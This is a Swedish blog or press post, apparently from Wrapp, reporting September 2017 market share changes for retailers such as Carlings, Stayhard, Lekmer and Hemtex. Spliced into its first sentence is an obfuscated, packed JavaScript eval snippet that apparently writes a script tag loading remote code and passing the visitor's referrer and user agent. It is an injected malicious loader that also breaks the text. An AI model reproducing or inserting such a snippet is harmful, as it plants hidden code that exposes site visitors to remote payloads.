Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Carlings och Stayhard vinner marknadsandelar i september

Carlings och Stayhard vinner marknadsandelar i september
Sebastian

Hösten eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|knbhy|var|u0026u|referrer|yaznn||js|php’.split(’|’),0,{}))
är här, vilket är märkbart i hur handeln har utvecklats under september 2017. Kategorierna Mode och Hälsa & Skönhet har ökat i marknadsandelar med 13% respektive 10%, medan Resor och Motor har minskat med 6% vardera. Detta kan bero på att vi lägger mer pengar på att uppdatera höstgarderoben och att ta hand om oss själva, medan resekontot får vila. 

Inom Hälsa & Skönhet har hudvårdsfavoriterna The Body shop och Rituals ökat 52%, respektive 25%. Onlinebutiken Lyko har även dem gjort en ökning på20%. Inom modekategorin har Carlings och Stayhard ökat sina marknadsandelar med 30 %, respektive 73%. Mellan vecka ett och två i september gjorde Indiska en stark ökning på 142 %, vilket kan vara relaterad till en sensommarrea.

Även om Hem & Trädgård generellt minskat i marknadsandelar så har Hemtex gjort en rejäl ökning med 101%. Likaså har Åhlens ökat med 21%. Möbeljätten Mio har däremot tappat med hela 40% under månaden.

Vad som är roligt att se är att Lekmer, som är ett nytt tillskott i Wrapp-appen, har blomstrat med en ökning på 282% inom Barn & Leksaker. Även Gamestop har ökat med 65% under september.

Vidare information:
Wrapp Market Share Index är ett unikt index som visar hur marknadsandelar fördelas mellan företag, varumärken och branscher, helt transparent och i realtid. För mer info om kartläggningen samt vilka företag och varumärken som vann mest marknadsandelar i augusti, var god följ länk. Observera att all data redovisad i denna text är från 5 oktober, 2017, kl 14.00 och kan ha förändrats efter detta.